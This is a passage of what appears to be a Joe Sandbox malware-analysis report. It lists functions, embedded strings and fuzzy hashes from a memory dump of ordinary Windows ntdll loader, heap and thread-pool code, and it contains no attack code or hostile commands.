Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
Instruction ID: 07f265c53810513e4e3b694b74ac580ef6125ed54c84b33e5daad3f8c8d1ff76
Opcode Fuzzy Hash: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
Instruction Fuzzy Hash: D0613476604B129BDB22CF2CC885B3AF7E1BF80B50F158559EC569B291E770EC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 017264AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01780FE5
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01781028
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0178106B
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017810AE

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
Instruction ID: bcbe1a320d2ebd5edc350c5e78a5339bc746e8df7e7a3d2501e45a3a26cd2abc
Opcode Fuzzy Hash: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
Instruction Fuzzy Hash: 7A71E3B19043159FCB21EF19C888B9BBFA8EF94764F500469FD488B14AD334D589CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0174245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0178A992
LdrpDynamicShimModule, xrefs: 0178A998
apphelp.dll, xrefs: 01742462
minkernel\ntdll\ldrinit.c, xrefs: 0178A9A2

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
Instruction ID: 5b1b71c2057f22ad524ea62e24e14d29c56bae0c563780150a9632fe815c2e8b
Opcode Fuzzy Hash: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
Instruction Fuzzy Hash: 3F312A77640202ABDB31AF5DD885E6AFBB8FB84714F26005AFD01A7249D7B05A41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 017329A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01733264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0173327D
HEAP[%wZ]: , xrefs: 01733255

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
Instruction ID: 6d9ef0ee985e5aafab084fec2d092322e071d686ca71c999b661f3be137bc984
Opcode Fuzzy Hash: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
Instruction Fuzzy Hash: 63929A71A046499FEB25CF68C444BAEFBF1FF88300F188099E959AB392D735A945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01730770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 017850CA
HEAP: , xrefs: 017850BD
HEAP[%wZ]: , xrefs: 017850AE

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
Instruction ID: 29321822eee6bba1b9de94d38d6221337ff291e1e0c6ee4fc84571cbb21b5b03
Opcode Fuzzy Hash: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
Instruction Fuzzy Hash: ABF1BE70A40606DFEB25DF68C894B6AF7F5FF84304F1481A8E5169B386D734EA81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01746962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 01746C24
, xrefs: 0178CA51

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
Instruction ID: 7758d3631844b52ac7abe1bbad1c800a5075a946ea4543a1b62b50a0e955725a
Opcode Fuzzy Hash: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
Instruction Fuzzy Hash: FAC27F716083419FE72ACF28C881BABFBE5AF89754F04896DF999C7241D734D844CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0171A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 0177C2E6
UseFilter, xrefs: 0171A1C1
\??\, xrefs: 0177C1E4

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
Instruction ID: dc928f80127ced58e0ef87ff949d10475f54df84fb6e50b54ea6b6f822f14ad6
Opcode Fuzzy Hash: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
Instruction Fuzzy Hash: 28A13E7191162A9BDF329F68CC88BE9F7B8EF48710F1041EAD909A7251D7359E84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01740BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

LdrpCheckModule, xrefs: 0178A117
Failed to allocated memory for shimmed module list, xrefs: 0178A10F
minkernel\ntdll\ldrinit.c, xrefs: 0178A121

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
Instruction ID: 6b33cafa93b402765dddbb133e043f63865cef688884d5d85d4d4edb2d82b718
Opcode Fuzzy Hash: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
Instruction Fuzzy Hash: EB71DE71A00206DFDB25EF68C984AFEF7F8FB84204F14406DE942EB255E774AA42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 01730A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0178534D
HEAP: , xrefs: 01785342
HEAP[%wZ]: , xrefs: 01785335

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
Instruction ID: 2d8cb52d0606861c33f70375b2176dade747ac617b6950b02afe8fd05d503d43
Opcode Fuzzy Hash: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
Instruction Fuzzy Hash: E761CE70600301DFDB29DF28C844B6AFBE1FF85308F148599E4498F296D770E981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0175C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 017982DE
Failed to reallocate the system dirs string !, xrefs: 017982D7
minkernel\ntdll\ldrinit.c, xrefs: 017982E8

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
Instruction ID: 69bde59306c79a7395239508ad7fd6823f835fa1ea3607fcc5cc1d038a67e0e1
Opcode Fuzzy Hash: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
Instruction Fuzzy Hash: 4E41F372544305ABD722EB68DC48B5BF7ECEF48A50F10492AF955D3299E7B0D900CB91

Uniqueness

Uniqueness Score: -1.00%

Function 017DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 017DC1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017DC1C5
PreferredUILanguages, xrefs: 017DC212

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
Instruction ID: 2744613aea18f2d4fcb337b72f6fa15084ce138cda665eac1e1fdaa9dd50c5f5
Opcode Fuzzy Hash: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
Instruction Fuzzy Hash: 23416371E0420DEBDB12DAD8C895FEEFBBDAB18700F14416EEA09B7244D774AA44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 017B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 017B4172
@, xrefs: 017B4225
LdrpResValidateFilePath Enter, xrefs: 017B4160

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
Instruction ID: f8fa6b3dccd98f52f59df9a17c2f3ca44820691accc96306994187fa7b2ed058
Opcode Fuzzy Hash: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
Instruction Fuzzy Hash: 2A41F431A04658CBEB26DB99C888BEDFBB8FF95340F140469D903EB796D7349941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 017A4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpCheckRedirection, xrefs: 017A488F
minkernel\ntdll\ldrredirect.c, xrefs: 017A4899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017A4888

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
Instruction ID: 09272011ce66559ef06b665e42738e439b865f3bc093614727b83b3845bac2c1
Opcode Fuzzy Hash: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
Instruction Fuzzy Hash: 5241D332A442919FCB21CE1CE840A26FBE4EFC9A50F49076DED4AD7215D7B2D800CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01730BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01785449
HEAP: , xrefs: 0178543E
HEAP[%wZ]: , xrefs: 01785431

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
Instruction ID: 675aeddb6bd654cf8152107888ce909b9f089d7b66c6cefb89aa40b4b5abe9e9
Opcode Fuzzy Hash: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
Instruction Fuzzy Hash: 3911AC32395142DFDB29EA1CC859B6AF3A5EF80616F1881A9F40ACB65ADB30D841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 017A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 017A20F3
LdrpInitializationFailure, xrefs: 017A20FA
minkernel\ntdll\ldrinit.c, xrefs: 017A2104

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
Instruction ID: aba1b627513cf19e9f75397be503d447c436f93d16b0204a25c0910851822c3b
Opcode Fuzzy Hash: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
Instruction Fuzzy Hash: 3FF0FC76780309BBE725D64CDC5AF99B7ACFB81B54F90046DFB00772C6D5B0A640CA51

Uniqueness

Uniqueness Score: -1.00%

Function 017303E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01784D8A

Strings

#%u, xrefs: 01784D82

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
Instruction ID: c6dae95a90671388209164b7f2a108ee5cbe164f6dc5b3dfb6bb940baae24d97
Opcode Fuzzy Hash: 90bbda21c5f6cc3c504df7270ca4d87435bcc0373c26f78fab9371f111f3799a
Instruction Fuzzy Hash: 8D715971A0014A9FDB11DFA8C994FAEFBF8BF48704F144065E905E7256EA78EE41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0172A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Exit, xrefs: 0172AA25
LdrResSearchResource Enter, xrefs: 0172AA13

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
Instruction ID: 5c86fc2b37721d00ee9ebf37d6f4eb1811ad5a57431af5b2108e2b5e93df3245
Opcode Fuzzy Hash: f0851d7fa35336b496b1da40b739ea430652871fa4fece9d03b7337824f811df
Instruction Fuzzy Hash: 0BE17E71E40269AFEB22DE9CC984BAEFBBAFF14710F10446AE901E7651D734D942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 017EA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 017EA44B
`, xrefs: 017EA551

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: bed465f9165ee9c69c1ca7c9f8acdab98f908a023f900b2423c7336cc770c5a9
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: FAC1C1312043429BEB25CF28C849B6BFBE5AFD8318F184A2DF696CB291D774D505CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0179E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0179E751
Legacy, xrefs: 0179E75A

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: c5e99d15303baae47ca3e29a68afa18a987e7220b2fd1f58a5966dfbbbd3f3b9
Instruction ID: 065c3699c00c5f04cb40dc7058710cceebe46d6c75e7407d6f24422f1acb81e7
Opcode Fuzzy Hash: c5e99d15303baae47ca3e29a68afa18a987e7220b2fd1f58a5966dfbbbd3f3b9
Instruction Fuzzy Hash: 5C615871E407199FDB24DFA8D844BAEFBB9FB48700F14406DE649EB291DB31A944CB50

Uniqueness

Uniqueness Score: -1.00%

Function 017C43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 017C4525
@, xrefs: 017C4437

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
Instruction ID: f8de8f86df775d5018cd26ca86befbc7f8d8503946e7820aa37758b90c3312ba
Opcode Fuzzy Hash: fe58a87666f7d0f49e15d3bfe93412df10a64a712559aedc44cbf0d7de2e8249
Instruction Fuzzy Hash: 75511871E0021DAEDB11DFA9CC94AEEFBBCEB54B54F100529EA11B7290D7309A05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 017204E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0172063D
kLsE, xrefs: 01720540

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
Instruction ID: e28f8e93adf7a3a0787b8c05ee6ac45ee5116a9e94557eb56b6f5c8948f07373
Opcode Fuzzy Hash: 6436ab65d4ed9c6f0ddd396acf2115b528fe362207e74a95b852018dc95dfaa4
Instruction Fuzzy Hash: 53519C715047528FD734DF69C544AA7FBE4AF84304F20483EFAAA87241E7749546CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0172A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0172A309
RtlpResUltimateFallbackInfo Enter, xrefs: 0172A2FB

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
Instruction ID: a97f029b315711bd60d75fbc3a913aacd86ffe127a9ecfaecc8e1e0fdcdc8ea5
Opcode Fuzzy Hash: 7f86f1ca255b65a9fa8c5f8a96d389c9e2a2c75443de88b8eb20294f0901387d
Instruction Fuzzy Hash: 2C41CC31A01669DBDB21DF69C844B6EFBB4FF84700F2440A9E900DB693E2B5D941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0175A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 0175A5E4
Threadpool!, xrefs: 0175A5E9

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
Instruction ID: bee52fb0c18b88431526460da0bd155e611e97da8c9603a898ac1adce85c60f2
Opcode Fuzzy Hash: 1c30285a0538e7fc8715f07f6d864b96811073b7a29afebc4c834441be576b85
Instruction Fuzzy Hash: 2001F4B2640740AFD351DF24CD49F16B7E8EB94715F058A3DAA49C7190E3B4D904CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0172C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0172C8C3, 0172CA40

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 1dbb93d224046157780ce912050a169358675ca603c0fac296a0ff84d89b52c1
Instruction ID: 334f0514766d71f5b8d0de6f656e11b61c361e683e0fd138e9c2815f41c2e950
Opcode Fuzzy Hash: 1dbb93d224046157780ce912050a169358675ca603c0fac296a0ff84d89b52c1
Instruction Fuzzy Hash: DC826B75E002288FEB25CFA9C884BEDFBB5FF58310F148169D959AB355D7309982CB50

Uniqueness

Uniqueness Score: -1.00%

Function 017A6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 017A65C1

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
Instruction ID: e6fd89486bf55db7baa08dd12fdcf986ebaafdc7ff06a4cab2d0b80dc0653251
Opcode Fuzzy Hash: 80afecf5ce689db4cbf6bbfc53c9aa34c1b6e98d144cf924243cc296c8425e95
Instruction Fuzzy Hash: D1919272940219AFEB21DF94CD85FAEFBB8EF58750F540165F600AB195D774AD00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 017CE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 017CE1FA

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 5e2dc08243945d72dbb1970f71d5b313dc090f16e32d314ad1eaaa3bdaf691a9
Instruction ID: 78d84c9edf698a3cf8cdf2bc16bb59007bba98319b16c986d52c20030ad652e1
Opcode Fuzzy Hash: 5e2dc08243945d72dbb1970f71d5b313dc090f16e32d314ad1eaaa3bdaf691a9
Instruction Fuzzy Hash: D6917072901649AFDB22ABA5DC48FAFFF7AEF85B50F10002DF501A7251EB74A901CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0175A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 017967C9

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 78921aa5910605e59f2cb985d8be83f28cce63a6220b54431d3bad1ab8056cf8
Instruction ID: b58ee1a6311c1ae20e2d66f15cbf8d822e0e9ea5aff8a023d18d1f09d6bc7bb2
Opcode Fuzzy Hash: 78921aa5910605e59f2cb985d8be83f28cce63a6220b54431d3bad1ab8056cf8
Instruction Fuzzy Hash: E47160B5E0020A9FDF28CF9CE590AADFBB1BF48710F14826EF905AB245E7719945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 017C4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 017C4A7F

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 1bba803433581530f2d33e745760bf986e85442fe9e5c9bf16f4102a88465cf5
Instruction ID: b43c0b8c344bcb9c09fb3db9db4954580171aa29c2d3c979181e33ba472d20bc
Opcode Fuzzy Hash: 1bba803433581530f2d33e745760bf986e85442fe9e5c9bf16f4102a88465cf5
Instruction Fuzzy Hash: F5519C72D0022ADBDB10DF9DD854AAEFBB4AF08F50F05416EEA12BB254D3349D01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0173E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0173E6A4

Memory Dump Source

Source File: 00000002.00000002.2046479384.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16f0000_1.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 5cdb6adbe25e606278d503117ec4eaa6dd161ab24c07e5bf5fc972d832897e47
